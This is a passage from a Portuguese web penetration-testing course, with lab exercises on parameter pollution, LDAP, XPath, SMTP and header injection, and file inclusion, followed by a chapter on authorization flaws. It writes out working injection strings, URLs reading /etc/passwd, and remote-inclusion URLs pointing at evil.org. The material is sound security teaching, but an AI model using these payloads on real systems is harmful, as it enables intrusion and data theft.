19. Clique em Bypass a Path Based Access Control Scheme.
20. Observe a URL na barra de endereos e anote os valores dos parmetros Screen e Menu.
21. Digite a seguinte URL na barra de endereos e pressione [Enter]:
http://webgoat.esr.rnp.br:8080/webgoat/attack?Screen=92&Screen=99&8
menu=200
22. Qual das instncias de Screen foi considerada pela aplicao?
23. Digite o seguinte URL na barra de endereos e pressione [Enter]:
http://webgoat.esr.rnp.br:8080/webgoat/attack?Screen=99&Screen=92&8
menu=200
24. O resultado foi o esperado das tecnologias JSP/Tomcat?
354
25. Digite o seguinte URL na barra de endereos e pressione [Enter]:
http://www.google.com/search?q=escola&q=superior&q=redes
26. Como os parmetros foram tratados neste caso?
Poluio de parmetros HTTP

Nesta parte da atividade, o ataque propriamente dito ser exercitado.
1.
Acesse http://hpp.esr.rnp.br/.

4. Passe o mouse sobre cada link e veja a URL associada na barra de estado. Que posio o
parmetro poll_id ocupa na query string?

5. Clique em XSS e veja a pgina exibida.
7.
Clique em Injeo de SQL e veja a pgina exibida.

9. Clique em CSRF e veja a pgina exibida.
10. Acesse http://hpp.evil.org/.
11. Passe o mouse sobre o link e veja a URL associada na barra de estado. Que parmetro
adicional passado em relao ao Passo 3?
12. Clique em Vote no melhor ataque! e observe que a pgina em hpp.esr.rnp.br acessada.
13. Passe o mouse sobre cada link e veja a URL associada na barra de estado. O que mudou
em relao ao Passo 4?
14. Clique em XSS e veja a pgina exibida.

16. Clique em Injeo de SQL e veja a pgina exibida.
18. Clique em CSRF e veja a pgina exibida.
19. Qual o resultado do ataque?

23. Passe o mouse sobre cada link e veja a URL associada na barra de estado. Que posio o
parmetro poll_id ocupa na query string?

24. Digite o seguinte na barra de endereos e pressione [Enter]:
http://hpp.esr.rnp.br/build_poll2.php?numero=123456%26id%3d3
20. Acesse http://hpp.esr.rnp.br/index2.php.
355
25. Passe o mouse sobre cada link e veja a URL associada na barra de estado. Em que ordem
esto as instncias do parmetro id?
26. Clique em XSS e veja a pgina exibida. O ataque funcionou?
27. Acesse http://hpp.evil.org/index2.php.

28. Passe o mouse sobre o link e veja a URL associada na barra de estado. Qual o propsito
do caractere # no final da URL?
29. Clique em Vote no melhor ataque! e observe que a pgina em hpp.esr.rnp.br acessada.
30. Passe o mouse sobre cada link e veja a URL associada na barra de estado. O que mudou
em relao ao Passo 25?
31. Clique em XSS e veja a pgina exibida. O ataque funcionou?
Atividade 4 Injeo em filtros LDAP

A presente atividade tem por objetivo ilustrar ataques de injeo em filtros LDAP, tecnologia
muito usada em sistemas de gesto de identidades e de controle de acesso.
Todos os passos devem ser executados na mquina virtual do aluno, e altamente
recomendado que se tente traar a estratgia de explorao, antes de seguir o
roteiro fornecido.
Injeo em filtros baseados em operador &

Esta parte da atividade aborda as tcnicas para injeo em filtros baseados em operador
&, quando o servidor permite que tais ataques ocorram.
1.
2. Acesse http://ldap.esr.rnp.br/.
3. Digite esruser e esruser nos campos ID e Senha, respectivamente, e clique em
Buscar Informao.
356

5. Digite esruser e senha nos campos ID e Senha, respectivamente, e clique em
Buscar Informao.
6. Pelos resultados obtidos nos Passos 3 e 5, que tipo de operador est sendo usado
pelo filtro?
7.
Pressione Alt + [Seta para esquerda], para retornar pgina anterior.
8. Fornea esruser( e esruser para os campos ID e Senha, respectivamente, e clique em
Buscar Informao. O que se infere pelo erro exibido?

10. Digite esruser)(&) e s nos campos ID e Senha, respectivamente, e clique em
Buscar Informao.
11. Por que o registro foi exibido, uma vez que a senha informada diferente?
13. Digite *)(uid=root) e s nos campos ID e Senha, respectivamente, e clique em Buscar
Informao. Observe que este ataque pressupe o conhecimento do atributo uid.

14. Qual seria a estrutura geral do filtro usado pela aplicao?
Injeo em filtros baseados em operador |

Neste exerccio, as tcnicas de injeo em filtros baseados em operador | so exploradas.
1.
Acesse http://ldap.esr.rnp.br/index2.php.
2. Marque Impressora e clique em Listar dispositivos.

3. Observe a URL exibida no navegador web.
5. Teste vrias combinaes de itens, para observar os resultados e os parmetros utilizados.
6. Digite a seguinte URL na barra de endereos e clique na seta verde:
http://ldap.esr.rnp.br/search2.php?imp=impressora%28&Submit1=Listar+8
dispositivos
7.
O que se infere pela mensagem exibida?
8. Digite a seguinte URL na barra de endereos e clique na seta verde:
http://ldap.esr.rnp.br/search2.php?imp=impressora)(%26&Submit1= 8
9. Explique a razo do ataque funcionar.
10. Qual seria a estrutura geral do filtro usado pela aplicao?
Listar+dispositivos
357
Atividade 5 Injeo em filtros LDAP s cegas

Quando o resultado da injeo em filtros LDAP no exibido ao usurio, uma tcnica s cegas
deve ser empregada, para extrao de informao, conforme ser visto nesta atividade. Todos
os passos do roteiro devem ser executados na mquina virtual do aluno, e recomendado
tentar traar a estratgia de explorao antes de seguir as instrues fornecidas.
1.
2. Acesse http://ldap.esr.rnp.br/.
3. Digite esruser e esruser nos campos ID e Senha, respectivamente, e clique em
Buscar Informao.
5. Digite esruser e senha nos campos ID e Senha, respectivamente, e clique em
Buscar Informao.
7.
Qual seria a estrutura geral do filtro usado pela aplicao, conforme visto na atividade
anterior?
8. Fornea esruser)(objectClass=user e esruser para os campos ID e Senha, respectiva-
mente, e clique em Buscar Informao.

9. A classe do objeto user?
11. Fornea esruser)(objectClass=account e esruser para os campos ID e Senha, respecti-
vamente, e clique em Buscar Informao.

12. A classe do objeto account?
14. Para descobrir se existe um atributo phone, digite esruser)(phone=* e senha nos
campos ID e Senha, respectivamente, e clique em Buscar Informao. O que se conclui?
16. Realize teste similar ao do Passo 14, para verificar a existncia do atributo gecos.
17. Fixe o valor do campo Senha para esruser e varie o valor de ID, conforme exemplo
abaixo, para descobrir a primeira letra do atributo gecos:
esruser)(gecos=A*
esruser)(gecos=B*
...
esruser)(gecos=a*
...
358
18. Repita o Passo 17, para as demais posies do atributo.

19. Qual o valor do atributo, para o objeto esruser?
20. Na pgina inicial, digite esruser)(homeDirectory=* e esruser nos campos ID e Senha,
respectivamente, e clique em Buscar Informao. O campo existe?
22. Repita o Passo 20, trocando o valor de ID para esruser)(homeDirectory=/home/
esruser. O que acontece?
24. Repita o Passo 20, trocando, agora, o valor de ID para esruser)(homeDirectory=/*.
25. Por que nenhum elemento foi encontrado?
Atividade 6 Injeo de comandos SMTP e de cabealhos de e-mail

Esta atividade visa ilustrar ataques de injeo de comandos SMTP e de cabealhos de e-mail,
que so comuns em pginas que aceitam comentrios e perguntas de usurios do sistema.
Realize todos os exerccios na mquina virtual do aluno e procure descobrir a estratgia de
explorao, antes de seguir o roteiro.
Adulterao de destinatrio
Esta parte da atividade ilustra como explorar uma aplicao que define o destinatrio da
mensagem, com base em um campo controlado pelo usurio.
1.
2. Acesse http://maili.esr.rnp.br/.
3. Pressione Ctrl+U, para visualizar o cdigo HTML.
4. Procure pelo campo realto e veja o valor dele.
~$ ssh supervisor@192.168.213.200
7.
Fornea a senha supervisor.
8. Acesse a caixa de correio do usurio supervisor:
~$ mail
9. Abra uma segunda janela de terminal.
~$ ssh outro@192.168.213.200
359
11. Fornea a senha outro.

12. Acesse a caixa de correio do usurio outro:
~$ mail
13. Retorne aplicao e preencha os campos do formulrio, criando uma mensagem com
ttulo Primeira mensagem. Em seguida, clique em Enviar mensagem.

14. Clique em Retornar pgina anterior.
15. Volte ao terminal do usurio supervisor e acesse novamente a caixa de correio:
~$ mail
16. Visualize a mensagem, pressionando 1.
17. Retorne ao Firefox.
18. Clique no menu Tools, seguido de Tamper Data.
19. Na janela que aparece, clique em Start Tamper.
20. Retorne ao formulrio e componha uma mensagem com ttulo Segunda mensagem.
21. Clique em Tamper, na caixa de dilogo que aparece.
22. Altere o parmetro realto para outro%40localhost e clique em OK.
23. No Firefox, clique em Retornar pgina anterior.
24. Na caixa de dilogo que aparece, desmarque Continue Tampering? e clique em Submit.
25. Acesse o terminal do usurio supervisor e pressione h, no prompt do cliente de
e-mail. A mensagem foi enviada para esta caixa de correio?
26. Acesse o terminal do usurio outro e acesse a caixa de correio dele:
~$ mail
27. Pressione 1, para visualizar a mensagem.
Injeo de cabealhos de e-mail

Nesta parte da atividade, o uso do parmetro additional_headers ser explorado, para
enviar a mensagem a destinatrios adicionais.
1.
Acesse a janela do Tamper Data e clique em Start Tamper.
2. Retorne janela do Firefox.

3. Crie uma mensagem, com ttulo Terceira mensagem, e clique em Enviar Mensagem.
4. Clique em Tamper, na caixa de dilogo que aparece.
5. Altere o parmetro from para o texto abaixo:
new%40esr.rnp.br%0d%0aCc%3aoutro%40localhost
6. Clique em OK.
7.
Clique em Stop Tamper na janela do Tamper Data.
8. Retorne ao Firefox e clique em Retornar pgina anterior.
360
9. Acesse o terminal do usurio supervisor e pressione h.

10. Pressione 2 para ler a mensagem.
11. Acesse o terminal do usurio outro e pressione h.
13. Feche a janela do Tamper Data.
Injeo de comandos SMTP

O objetivo desta parte da atividade fixar os conceitos de injeo de comandos SMTP, por
meio da explorao de uma aplicao que interage diretamente com o servidor de e-mails.
Retorne ao Firefox e acesse http://maili.esr.rnp.br/index2.php.
1.
2. Crie uma mensagem com ttulo Quarta mensagem e preencha o corpo dela com o
seguinte texto:
Quarta mensagem.
.
Este texto sera cortado.
3. Clique em Enviar mensagem.
4. Clique em Retornar mensagem anterior.
6. Pressione 3 para visualizar a mensagem e a observe atentamente. O texto inteiro subme-
tido por meio da aplicao aparece ou foi cortado? Por que isso aconteceu? O que significa?
Retorne ao Firefox e inicie a composio de nova mensagem com ttulo Quinta mensagem
e com o corpo definido abaixo:
Quinta mensagem.
.
MAIL FROM:<evil@evil.org>
RCPT TO:<outro@localhost>
From:evil@evil.org
To:outro@localhost
Subject: Mensagem injetada!
Esta mensagem veio de carona!

7.
Clique em Enviar mensagem.
DATA
361

10. Acesse o terminal do usurio outro e pressione h.
12. Feche as janelas de terminal.
Atividade 7 Injeo de XPath

Esta atividade visa familiarizar o aluno com a linguagem XPath e com os ataques de injeo
nela baseados. Os exerccios fazem referncia ao documento XML ilustrado na Figura 7.18
e devem ser realizados na mquina virtual do aluno. Recomenda-se que se tente traar a
estratgia de explorao, antes de seguir o roteiro disponibilizado.
Introduo linguagem XPath

Nesta atividade, sero realizadas diversas consultas baseadas em XPath.
1.
2. Acesse http://xpathi.esr.rnp.br/ex.php.
3. Verifique o n diretamente sob a raiz, digitando a expresso /*, e clique em Pesquisar.
5. Altere a pesquisa para /child::* e clique em Pesquisar. O que muda?

7.
Fornea a expresso /users/* e clique em Pesquisar. Houve alguma alterao no resultado? Explique.

9. Digite /user e clique em Pesquisar. Por que a consulta no devolveu resultados?
11. Altere a expresso para //user e clique em Pesquisar. Por que agora foram listados ns?
362
13. Digite //user/name e clique em Pesquisar. Que outra expresso retornaria o mesmo
resultado?
15. Fornea //user[position()=3]/name e clique em Pesquisar.
17. Digite count(//name) e clique em Pesquisar.
19. Digite //user[position()<=3]/name e clique em Pesquisar.
Injeo de XPath
Esta parte do exerccio aborda o ataque de injeo de XPath.
20. Acesse http://xpathi.esr.rnp.br/.
21. Fornea esruser e esruser para os campos ID e Senha, respectivamente, e clique em
Buscar informao.
23. Repita o Passo 21, mas fornecendo senha para o campo Senha.
25. Digite ] e ] nos campos ID e Senha, respectivamente, e clique em Buscar informao.
Algum erro aconteceu?
27. Fornea or true() or e senha para os campos ID e Senha, respectivamente, e clique
em Buscar informao. O que aconteceu?
29. Repita o Passo 27, mas fornecendo or position()=2 or para o campo ID.
31. Repita o Passo 29, mas alterando o valor de position(), at que nenhum valor seja encontrado.
Atividade 8 Injeo de XPath s cegas

Dando continuidade atividade anterior, esta atividade ilustrar a verso s cegas do
ataque de injeo de XPath.
1.
2. Acesse http://bxpathi.esr.rnp.br/.

5. Digite Brasilia no campo Cidade e clique em Contar. Quantos usurios existem?

7.
Fornea Campinas and a=a para o campo Cidade e clique em Contar. Quantos usurios foram localizados? Por que isso aconteceu?
3. Digite Campinas no campo Cidade e clique em Contar. Quantos usurios existem?
363

9. Fornea Campinas and true() and a=a para o campo Cidade e clique em Contar.
O resultado obtido corresponde ao esperado?
11. Descubra o tamanho do nome do n de contexto, fornecendo o texto abaixo com valores
numricos crescentes para a posio marcada em vermelho:
Campinas and string-length(name(.))=1 and a=a

12. Qual o tamanho encontrado?
13. Encontre a primeira letra do nome do n de contexto, fornecendo o texto abaixo com
diferentes letras minsculas na posio marcada em vermelho:
Campinas and substring(name(.),1,1)=a and a=a

14. Qual o valor da primeira letra?
16. Repita o Passo 13, variando o primeiro argumento numrico de 2 a 4, para achar o valor
das demais letras. Qual o nome do n de contexto?
17. Verifique se o n possui atributos, fornecendo o texto abaixo, com valores nmericos
crescentes para a posio marcada em vermelho:
Campinas and count(attribute::*)=0 and a=a

18. Quantos atributos existem para o n de contexto?
19. Descubra o tamanho do nome do atributo, fornecendo o texto abaixo, com valores
numricos crescentes para a posio marcada em vermelho:
Campinas and string-length(name(attribute::*))=0 and a=a
20. Qual o tamanho do nome do atributo?
Atividade 9 Incluso de arquivos

A presente atividade tem por objetivo ilustrar ataques de incluso de arquivos locais e
remotos, em tempo de execuo. O roteiro fornecido deve ser seguido, empregando-se a
mquina virtual de aluno.
1.
2. Acesse http://filei.esr.rnp.br/.
364
3. Selecione Brasil e clique em Prosseguir.

4. Observe a URL exibida na barra de endereos.
6. Selecione Estados Unidos e clique em Prosseguir. O que mudou em relao URL vista
no Passo 4?
7.
Digite a seguinte URL na barra de endereos e clique no boto verde:
http://filei.esr.rnp.br/select.php?country=%2Fetc%2Fpasswd&Submit1= 8
Prosseguir
8. O que aconteceu? Por que nada foi exibido?
9. Suponha que existe um arquivo evil.php, gravado maliciosamente no servidor. Digite a
seguinte URL na barra de endereos e clique no boto verde, para inclui-lo:
http://filei.esr.rnp.br/select.php?country=evil&Submit1=Prosseguir
10. O ataque foi bem-sucedido?
11. Repita o Passo 9, mas fornecendo a URL a seguir:
http://filei.esr.rnp.br/select.php?country=select&Submit1=Prosseguir
12. O que contm a pgina de resposta? Qual a provvel razo do resultado obtido?
13. Digite a seguinte URL na barra de endereos e clique no boto verde:
http://filei.esr.rnp.br/select.php?country=http%3A%2F%2Fwww.evil.org8
%2Fevil&Submit1=Prosseguir
14. Que arquivo remoto foi includo?
15. Acesse http://filei.esr.rnp.br/index2.php.
17. Observe a URL exibida na barra de endereos e diga o que mudou em relao ao incio
da atividade.
http://filei.esr.rnp.br/select2.php?country=%2Fetc%2Fpasswd&Submit1= 8
Prosseguir
16. Selecione Brasil e clique em Prosseguir.
365
19. Repita o Passo 18, mas fornecendo a seguinte URL:
http://filei.esr.rnp.br/select2.php?country=http%3A%2F%2Fwww.evil.
org%2Fevil.php&Submit1=Prosseguir
366
Bibliografia 7
1 ALONSO, Chema; BORDN, Rodolfo; GUZMN, Antonio e BELTRN, Marta. LDAP Injection
& Blind LDAP Injection in Web Applications. Black Hat Europe 08, 2008.
1 BALDUZZI, Marco embyte. HTTP Parameter Pollution Vulnerabilities in Web Applications.

Black Hat Europe, 2011.
1 BALDUZZI, Marco; GIMENEZ, Carmen Torrano; BALZAROTTI, Davide e KIRDA, Engin. HTTP
Parameter Pollution Vulnerabilities in Web Applications. In: Proceedings of the Network
and Distributed System Security Symposium, NDSS 2011, The Internet Society, 2011.
1 BAROR, Yuval; YOGEV, Ayal e SHARABANI, Adi. Flash Parameter Injection A Security
Advisory. Whitepaper, IBM Rational Application Security Team, 2008.
1 BERGLUND, Anders; BOAG, Scott; CHAMBERLIN, Don; FERNNDEZ, Mary F.; KAY, Michael;
ROBIE, Jonathan e SIMON, Jrme. XML Path Language (XPath) 2.0 (Second Edition), W3C
Recommendation, dezembro de 2010.
1 BURSZTEIN, Elie; GOURDIN, Baptiste; RYDSTEDT, Gustav e BONEH, Dan. Bad Memories.
Black Hat USA, 2010.
1 CARETTONI, Luca e DI PAOLA, Stefano. HTTP Parameter Pollution. OWASP EU09 Poland,
The OWASP Foundation, 2009.
1 CLARK, James e DEROSE, Steve. XML Path Language (XPath) Version 1.0, W3C
Recommendation, novembro de 1999.
1 DANIEL, Chrysostomos. HTTP Parameter Pollution. White Paper, Acunetix, 2012.

1 DI PAOLA, Stefano e DABIRSIAGHI, Arshan. Expression Language Injection, White Paper, 2011.
1 DAZ, Vicente Aguilera. MX Injection Capturing and Exploiting Hidden Mail Servers. White
Paper, Internet Security Auditors, 2006.
1 FAUST, Sacha. LDAP Injection Are your web applications vulnerable? White Paper, SPI
Dynamics, Inc., 2003.
1 FORBES, Thomas e SIDDHARTH, Sumit. Hacking XPath 2.0. Black Hat Europe, 2012.
1 GRZELAK, Daniel. Log Injection Attack and Defence. SIFT Special Publication, SIFT
Information Security Services, 2007.
1 GUILLARDOY, Esteban, DE GUZMAN, Facundo e ABBAMONTE, Hernan. LDAP Injection

Attack and Defense Techniques. White Paper, Ridabeo Hack Lab, 2010a.
1 GUILLARDOY, Esteban, DE GUZMAN, Facundo e ABBAMONTE, Hernan. LDAP Injection

Attack and Defense Techniques. Em HITB Magazine, Volume 1, Issue 1, 2010b.
1 HOWARD, Michael, LEBLANC, David e VIEGA, John. 19 Deadly Sins of Software Security
1 JOURDAN, Guy-Vincent. Securing Large Applications Against Command Injections. Em
Aerospace and Electronic Systems Magazine, Volume 24, Issue 6, Pg. 15-24, IEEE, 2009.
1 KLEIN, Amit. Divide and Conquer HTTP Response Splitting, Web Cache Poisoning Attacks,
and Related Topics. White Paper, Sanctum, 2004a.
1 KLEIN, Amit. Blind XPath Injection. White Paper, Sanctum, 2004b.

1 KLEIN, Amit. Blind XPath Injection. White Paper, Watchfire, 2005.
367
1 LARANJEIRO, Nuno, VIEIRA, Marco e MADEIRA, Henrique. Protecting Database Centric Web
Services against SQL/XPath Injection Attacks. Em Database and Expert Systems Applications,
20 th International Conference, DEXA 2009, Linz, Austria, 31 de agosto 4 de setembro,
2009. Proceedings. Lecture Notes in Computer Science 5690, Springer, 2009.

1 MITROPOULOS, Dimistris, KARAKOIDAS, Vassilios e SPINELLIS, Diomidis. Fortifying
Applications Against Xpath Injection Attacks. Em The 4th Mediterranean Conference on
Information Systems, MCIS 2009, 2009.
1 PINTER, Dominik. Kentico CMS Security White Paper. Kentico Software s.r.o., 2011.
1 SMITH, Mark e HOWES, Tim. RFC 4515: Lightweight Directory Access Protocol (LDAP): String
Representation of Search Filters, 2006.
1 SU, Zhendong e WASSERMANN, Gary. The Essence of Command Injection Attacks in

Web Applications. Em POPL 06 Conference record of the 33rd ACM SIGPLAN-SIGACT
Symposium on Principles of Programming Languages, ACM, 2006.
1 VAN DER VLIST, Eric. XQuery Injection Easy to exploit, easy to prevent.... Em XML Prague
2011 Conference Proceedings, p. 177-189, 2011.
1 ZEILENGA, Kurt. RFC 4514: Lightweight Directory Access Protocol (LDAP): String Representation
of Distinguished Names, 2006a.
1 ZEILENGA, Kurt. RFC 4512: Lightweight Directory Access Protocol (LDAP): Directory Information
Models, 2006b.
368
8
Apresentar vulnerabilidades no mecanismo de autorizao e na lgica de negcio
e mostrar os mtodos que podem ser empregados para detect-las e explor-las.
conceitos
Autorizao, acesso direto a recursos, percurso de caminho, redirecionamento

no validado, condies de corrida, vulnerabilidades em lgica de negcio.
Introduo
Um dos objetivos de se autenticar um usurio no sistema consiste em fornecer meios de
negar ou autorizar operaes que ele deseja realizar, de acordo com os privilgios que
possui, alm de permitir o rastreamento do que feito na aplicao.
Essa verificao deve ser sempre executada, por um componente chamado de monitor
de referncias (Anderson, 1972), no momento em que uma ao iniciada, o qual deve
possuir as seguintes caractersticas, para atender os requisitos que se prope satisfazer:
1 Ser inviolvel.
1 Ser invocado em todo e qualquer acesso a um recurso.
1 Ser suficientemente pequeno para que possa ser analisado e ter sua correo comprovada.
Obviamente, muito difcil atingir o primeiro e o terceiro objetivos, principalmente, quando
se espera uma prova de segurana do componente. Por mais que ele seja desenvolvido,
por meio de um ciclo que considera segurana em todas as etapas, erros sempre podem
ocorrer, causando a introduo de vulnerabilidades.
Um problema mais grave, entretanto, resume-se em ignorar o segundo item da lista, o
que acontece frequentemente em aplicaes reais.
A lista de problemas, neste caso, compreende desde verificar os privilgios uma nica vez,
logo aps a autenticao, at deixar de validar de vez a legitimidade dos acessos. Note-se
que, em qualquer das situaes, um usurio malicioso consegue executar operaes as
quais no deveria.
Captulo 8 - Teste do mecanismo de autorizao e da lgica de negcio
objetivos
Teste do mecanismo de
autorizao e da lgica de negcio
369
A maneira como o monitor de referncias libera ou bloqueia uma dada ao deter-
minada pelo modelo de controle de acesso adotado, que um arcabouo responsvel

por definir quais recursos podem ser acessados pelas diversas entidades do sistema.
Existem trs tipos desses modelos:
1 Controle de acesso discricionrio (DAC): o proprietrio de cada objeto determina

quem tem o direito de acess-lo e quais operaes podem ser realizadas, por meio de
listas de controle de acesso atreladas a cada recurso.
1 Controle de acesso mandatrio (MAC): todos os recursos e entidades do sistema

recebem um rtulo contendo uma classificao e uma categoria, que determinam,
respectivamente, nveis hierrquicos de sensibilidade e necessidade de acessar e
conhecer os recursos. Por exemplo, cada informao do ambiente pode ser classificada como livre, restrita ou secreta e categorizada por projeto. Para ter o acesso
autorizado, uma entidade deve, ento, ter um nvel de sensibilidade maior ou igual
que o do objeto e fazer parte do projeto em que ele est rotulado.
1 Controle de acesso baseado em papis (RBAC): nesse modelo, cada usurio

associado a um ou mais papis, os quais espelham as diversas funes que podem
ser desempenhadas no ambiente. Privilgios sobre objetos e para realizar aes so
concedidos somente a papis, sempre de acordo com o mnimo necessrio para a
execuo da funo. Isso facilita a gesto de usurios, em cenrios de alta rotatividade, pois no necessrio alterar, periodicamente, as listas de controle de acesso
dos diversos recursos, como aconteceria no modelo DAC.
Ataques contra o mecanismo de autorizao podem ser horizontais ou verticais, dependendo do tipo de privilgio que necessrio obter (Stuttard e Pinto, 2007).
No primeiro caso, o objetivo consiste em acessar recursos pertencentes a outros usurios,
como a caixa de correio eletrnico alheia, por exemplo. No ltimo, o foco resume-se em conseguir um perfil mais privilegiado que o atribudo, como o de um administrador do sistema,
que capaz de executar qualquer operao e acessar qualquer objeto.
O mecanismo de autorizao, juntamente com o de autenticao e de auditoria, constitui
o mdulo de controle de acesso da aplicao, que fundamental para a segurana do
sistema, mas torna-se intil quando outras vulnerabilidades, como as vistas at aqui, afetam
o ambiente. Alm dessas, uma classe especial de defeitos de segurana, que ser abordada
neste captulo e afeta a lgica de negcio, tem forte impacto no arcabouo de controle de
acesso como um todo, pois resulta, comumente, em operaes no permitidas ou inesperadas sendo realizadas.
Vulnerabilidades na lgica de negcio de uma aplicao nunca so encontradas por ferramentas automatizadas e, muitas vezes, passam despercebidas em um teste de invaso, princiTeste de Invaso de Aplicaes Web
palmente, se for do tipo caixa preta. Um motivo para isso que cada ocorrncia desse tipo de
problema praticamente nica, afetando um aspecto totalmente especfico de um sistema.
A aplicao de leilo ilustrada no Captulo 3, que permitia bloquear os concorrentes, um
exemplo desse tipo de defeito. Outro caso que pode ser citado compreende um processo de
mltiplos estgios que ignora se os anteriores foram devidamente completados.
O restante deste captulo est organizado da seguinte maneira: em primeiro lugar, so
cobertos ataques de acesso direto a recursos, como pginas e outros objetos; em seguida,
as tcnicas para violao de controles no lado cliente so discutidas; depois disso, so apresentados os defeitos que permitem percurso de caminho, redirecionamento para outros
domnios e os que resultam em condies de corrida; por fim, vulnerabilidades na lgica de
negcio so abordadas, com a anlise de alguns exemplos reais.
370
Vulnerabilidades em aplicaes web
Voc se recorda de alguma aplicao web cuja URL apresentasse valores que pudessem ser
chaves primrias de tabelas ou recursos internos?
Acesso direto a recursos

Muitas aplicaes web no respeitam o requisito de um monitor de referncias de que
seja invocado em toda tentativa de acesso. Em vez disso, a verificao de privilgios

realizada em momento anterior, o que permite que o mecanismo de controle de acesso
do sistema seja violado.
Nesta seo sero apresentadas algumas variaes do ataque, as quais dependem do tipo de
recurso sendo controlado e das premissas incorretas assumidas pelo time de desenvolvimento.
Acesso direto a pginas

Uma implementao muito comum de controle de acesso encontrada em aplicaes
reais adota segurana por obscuridade, assumindo que um usurio no capaz de

requisitar determinado recurso, por desconhecer que ele existe.
O fluxo de execuo, nesses casos, envolve, em primeiro lugar, realizar a autenticao
do usurio. Caso isso seja bem sucedido, a aplicao verifica que aes ele pode solicitar
e cria itens de menu ou links, somente para as pginas que processam tais operaes.
Posteriormente, quando o usurio solicita que algo seja realizado, nada mais verificado pelo mecanismo de controle de acesso, e, portanto, a ao liberada diretamente.
Assim, basta efetuar uma requisio para qualquer URL vlida do sistema, para se conseguir um acesso sem a devida autorizao.
Para exemplificar esse cenrio, a Figura 8.1 ilustra as telas exibidas por uma aplicao para
dois usurios com perfis de acesso distintos.
(a)
(b)
H diversas recursos que um usurio malicioso pode emprega, para descobrir as URLs das
operaes s quais no tem acesso: registros de trilhas de auditoria, histrico de navegao,
trfego capturado, documentao da aplicao, interao com outros usurios do sistema,
inferncia a partir da estrutura geral das URLs usadas nos links disponveis, dentre inmeras
Figura 8.1
Aplicao com segurana por obscuridade: (a) Operaes
disponibilizadas
para um visitante.
(b) Operaes disponibilizadas para o
administrador
do sistema.
outras possibilidades. A partir desses exemplos, fica claro que essa abordagem de controle
371
de acesso completamente insegura, pois parte de uma premissa incorreta, com relao
incapacidade do usurio de descobrir o que no apresentado pela interface.
Para verificar se uma aplicao vulnervel a este ataque, o seguinte roteiro pode ser utilizado:
1. Se diversas contas de usurio, com diferentes perfis, estiverem disponveis para o teste:
1.1.Autentique-se na aplicao com cada uma das contas e percorra as diversas pginas
que a compem.
1.2.Anote todas as funcionalidades diferentes e as URLs correspondentes que aparecem
para cada uma das contas.

1.3.Com cada conta, tente acessar as funcionalidades disponveis somente para outros
usurios.
1.4.Se o acesso for permitido, o controle de acesso da aplicao vulnervel.
2. Se no, se somente uma conta estiver disponvel para o teste:
2.1.Autentique-se na aplicao e percorra as diversas pginas que a compem.
2.2.Anote todas as URLs das diversas funcionalidades apresentadas.
2.3.Verifique se h algum padro que pode ser identificado nas URLs.
2.4.Gere novas URLs, de acordo com o passo anterior, e tente acess-las.
Uso do cabealho HTTP Referer

O cabealho HTTP Referer (que deveria ser escrito Referrer) permite que clientes indiquem
para o servidor o endereo do recurso, a partir do qual a requisio est sendo realizada.
Isso possibilita, por exemplo, criar links para retornar pgina visitada anteriormente e
gerar estatsticas de onde o acesso se inicia. Enquanto esses so usos vlidos do cabealho, algumas aplicaes o utilizam inadvertidamente com fins de segurana.
A ideia justamente impedir acesso direto a recursos, obrigando que a requisio tenha
origem em uma pgina na qual, necessariamente, o usurio tenha passado pelo processo de autenticao. Contudo, a estratgia adota a premissa invlida de que o usurio
no capaz de definir o Referer como bem desejar.
Para ilustrar o problema, considere-se o seguinte trecho de cdigo em PHP, presente no
script responsvel por gerar o menu da interface administrativa da aplicao:
if (!isset($_SERVER[HTTP_REFERER]) ||
stripos($_SERVER[HTTP_REFERER], http://bssac.esr.rnp.br/
admin/)
=== false) {
echo(<h2>Origem não permitida!!!</h2><br>);
echo(<a href=http://bssac.esr.rnp.br/admin/>Retornar à
página de login</a>);
goto invalid_referer;
}
372
O propsito do if acima verificar se o valor do cabealho REFERER contm a URL passada

como argumento para a funo stripos(). Em caso negativo, uma mensagem de erro
exibida e o controle desviado para a seo de cdigo rotulada por invalid_referer.
Um usurio malicioso, para quebrar esse mecanismo de proteo, pode interceptar a requisio e inserir o cabealho Referer com o valor adequado, conforme ilustrado na Figura 8.2.
O teste para examinar se uma aplicao apresenta essa vulnerabilidade contm os passos
descritos abaixo:
1. Para cada uma das URLs identificadas na fase de mapeamento:
1.1.Digite-a na barra de endereos do navegador web e faa a requisio.
1.2.Se a aplicao exibir uma mensagem indicando que a origem da requisio no vlida:
1.2.1. Faa nova submisso, mas incluindo o cabealho Referer definido para a URL
da pgina, a partir da qual o recurso carregado, no fluxo normal de uso.
1.2.2. Se a pgina for carregada, a aplicao emprega o cabealho Referer para controlar o acesso e , portanto, vulnervel.
Acesso direto a objetos

Enquanto o acesso direto a pginas da aplicao constitui um ataque vertical, no qual se
busca mais privilgios, o acesso direto a objetos compreende um ataque horizontal, pois o
usurio j tem permisso para usar a funcionalidade, mas deseja manipular objetos alheios.
O problema acontece quando a aplicao expe ao usurio os identificadores internos
dos recursos, como chaves primrias de tabelas, por exemplo. Supondo que o processo de autorizao no ocorra imediatamente antes da operao, um usurio mal
intencionado, por meio da adulterao de parmetros, consegue alterar o valor da
chave utilizada para buscar o recurso e, assim, acessar um elemento arbitrrio, pertencente outra pessoa.
Considere-se, por exemplo, uma aplicao que permite que um usurio autenticado leia as
mensagens enviadas a ele, conforme ilustrado na Figura 8.3.
Figura 8.2
Adio de
cabealho Referer.
373
(a)
(b)
Inspecionando os links para as mensagens do usurio esruser, obtm-se as seguintes URLs:
http://bssac.esr.rnp.br/view.php?mid=1
Repetindo o processo para o usurio admin, chega-se ao seguinte resultado:
Observe que cada mensagem acessada invocando-se o script view.php, com um valor
diferente para o parmetro mid. O fato de os conjuntos serem disjuntos um bom
indicativo de que um mapa indireto, especfico para cada usurio, no empregado, para
mascarar o valor da chave de cada registro. Desse modo, para ler as mensagens de outros
usurios, o atacante apenas precisa alterar o valor do ndice de acess, enquanto estiver
autenticado. Esse defeito, por mais simples que seja, afetou a grande maioria das primeiras
verses de sistemas de correio eletrnico via web.
O roteiro abaixo pode ser empregad, para detectar a presena desta vulnerabilidade em
uma aplicao:
1. Se diversas contas de usurio, com diferentes perfis, estiverem disponveis para o teste:
1.1.Autentique-se na aplicao com cada uma das contas e percorra as diversas pginas
que a compem.
1.2.Anote todos os itens de entrada que paream ser chaves primrias de registros ou
identificadores de objetos e os respectivos valores.

1.3.Com cada conta, tente acessar os objetos de outra, alterando o valor do parmetro,
de acordo com o encontrado no passo anterior.

2. Se no, se somente uma conta estiver disponvel para o teste:
2.1.Autentique-se na aplicao e percorra as diversas pginas que a compem.
